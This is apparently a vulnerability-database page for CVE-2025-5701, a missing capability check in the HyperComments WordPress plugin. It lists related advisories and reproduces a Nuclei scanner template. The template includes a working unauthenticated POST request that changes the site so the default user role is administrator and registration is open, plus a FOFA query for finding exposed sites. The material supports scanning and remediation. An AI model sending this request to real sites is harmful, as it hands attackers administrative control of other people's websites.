| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| Exploit for CVE-2025-5701 | 12 Jun 202508:27 | – | githubexploit | |
| Exploit for CVE-2025-5701 | 11 Feb 202607:57 | – | githubexploit | |
| Exploit for CVE-2025-5701 | 5 Jun 202515:27 | – | githubexploit | |
| CVE-2025-5701 | 5 Jun 202511:45 | – | circl | |
| WordPress plugin HyperComments 安全漏洞 | 5 Jun 202500:00 | – | cnnvd | |
| CVE-2025-5701 | 5 Jun 202511:15 | – | cve | |
| CVE-2025-5701 HyperComments <= 1.2.2 - Unauthenticated (Subscriber+) Arbitrary Options Update | 5 Jun 202511:15 | – | cvelist | |
| EUVD-2025-16984 | 3 Oct 202520:07 | – | euvd | |
| CVE-2025-5701 | 5 Jun 202512:15 | – | nvd | |
| 📄 WordPress HyperComments 1.2.2 Privilege Escalation | 12 Jun 202500:00 | – | packetstorm |
id: CVE-2025-5701
info:
name: HyperComments <= 1.2.2 - Arbitrary Options Update
author: kylew1004
severity: critical
description: |
The HyperComments plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the hc_request_handler function in all versions up to, and including, 1.2.2. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.
impact: |
Unauthenticated attackers can update arbitrary WordPress options including default user roles, enabling privilege escalation to administrator access through self-registration.
remediation: |
Upgrade HyperComments plugin to a version later than 1.2.2 that implements proper capability checks on the hc_request_handler function.
reference:
- https://github.com/Nxploited/CVE-2025-5701/blob/main/CVE-2025-5701.py
- https://nvd.nist.gov/vuln/detail/CVE-2025-5701
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-5701
epss-score: 0.01718
epss-percentile: 0.74685
cwe-id: CWE-862
metadata:
verified: false
max-request: 2
vendor: wordpress
product: hypercomments
fofa-query: body="/wp-content/plugins/hypercomments"
tags: cve,cve2025,wp,wp-plugin,wordpress,hypercomments,priv-esc,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/hypercomments/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- compare_versions(detected_version, "<= 1.2.2")
internal: true
extractors:
- type: regex
part: body
name: detected_version
group: 1
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
internal: true
- raw:
- |
POST /wp-admin/index.php?hc_action=update_options HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{"default_role":"administrator","users_can_register":"1"}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '(?i)\{\s*"result"\s*:\s*"success"\s*\}'
- type: status
status:
- 200
extractors:
- type: dsl
dsl:
- '"version: " + detected_version'
# digest: 4b0a00483046022100b0793cb23ca5c53ccc41939e2215c4bdf991592b21f03f7fc5eb6ff57fda89ea022100ba8987843cd7528e23a7a7ebf1a4ba1c71a130085d92f023dbdc6600d8b07335:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation